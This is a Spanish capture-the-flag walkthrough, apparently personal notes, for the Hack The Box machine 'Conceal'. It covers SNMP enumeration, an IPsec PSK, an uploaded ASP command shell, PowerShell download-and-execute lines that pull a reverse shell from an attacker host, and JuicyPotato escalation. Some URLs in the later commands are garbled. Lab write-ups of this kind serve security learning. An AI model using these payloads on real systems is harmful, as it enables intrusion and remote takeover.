Cu3rv0x

nmap -A -p- -oA output 10.129.155.64 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210520130835.png

nmap -sC -sV -O -p- -oA conceal 10.129.155.64

gobuster dir -k -u http://10.129.155.64/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210520150556.png

nmap -sU -O -p- -oA conceal-udp 10.129.155.64

Pasted image 20210520145646.png

nmap -sU -p 160-165 10.129.155.64

Pasted image 20210520130054.png

nmap -sU -sC --top-ports 20 -oA udp-conceal 10.129.155.64

Pasted image 20210520131210.png Pasted image 20210520131231.png Pasted image 20210520131254.png

Vemos que snmp-netstat nos despliega algunos puertos tcp abiertos

snmpwalk -v 2c -c public 10.129.155.64

Pasted image 20210520131847.png

Vamos a crackstation.net y ponemos la contrasena que parece ser Dudecake1!

Pasted image 20210520132147.png

Tratamos de hacer una conexion a la vpn

ike-scan -M 10.129.155.64

Pasted image 20210520132415.png

Podemos ver que el Internet Key Exchange o IKE esta encriptado con DES, con un hash de SHA-1. La version de IKE es v1 y no v2.

%any : PSK "Dudecake1!"

Pasted image 20210520142015.png

Se introduce la info en /etc/ipsec.conf y /etc/ipsec.conf

Pasted image 20210520134026.png

charondebug es para poder troubleshootear la conexion. authby es para el uso de psk auth esp,ike y keychange lo sacamos del ike-scan left y right son las dos maquinas type=transport es para la conexion de un nodo al otro

Pasted image 20210520142034.png

ipsec restart

ipsec up conceal

Pasted image 20210520144619.png

Me salia este error cuando queria hacer una conexion. Al final tuve que instalar esto:

sudo apt install strongswan strongswan-pki libcharon-extra-plugins libcharon-extauth-plugins libstrongswan-extra-plugins

Pasted image 20210520144719.png

nmap -sT -p- --min-rate 10000 -oA alltcp_vpn 10.129.155.64

Pasted image 20210520150243.png

nmap -sT -p 21,80,135,139,445 -sC -sV -oA scripts_vpn 10.129.155.64

Pasted image 20210520150308.png

nmap -sC -sV -sT -o full 10.129.155.64

ftp 10.129.155.64

Pasted image 20210520151156.png

Trate de subir un archivo aspx y me salia un error. Si pude subir un archivo txt y asp

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

Pasted image 20210520151746.png

curl http://10.129.155.64/upload/cmd.asp?cmd=whoami

Pasted image 20210520152459.png

python -m http.server 8888

Pasted image 20210520153323.png

nc -lvnp 4444

http://10.129.155.64/upload/cmd.asp?cmd=powershell%20iex(New-Object%20Net.Webclient).downloadstring(%27http://10.10.14.116:8888/Invoke-PowerShellTcp.ps1%27)

Pasted image 20210520153414.png

systeminfo

Pasted image 20210520153504.png

whoami /priv

Pasted image 20210520153616.png

Como podemos ver que tiene SetImpersonatePrivilege podemos usar JuicyPotato

Creamos un archivo shell.bat

powershell -c iex(new-object   
net.webclient).downloadstring('[http://10.10.14.31/](http://10.10.14.110:5555/)  
shell2.ps1')

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .  
mv Invoke-PowerShellTcp.ps1 shell2.ps1

powershell -c iex(new-object   
net.webclient).downloadstring('[http://10.10.14.31/](http://10.10.110/  
shell2.ps1')

(new-object net.webclient).downloadfile('http://10.10.14.110/  
shell.bat', 'C:\Users\Destitute\Desktop\shell.bat')

nc -lvnp 443

./juicy.exe -p shell.bat -l 1337 -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"

Pasted image 20210818144255.png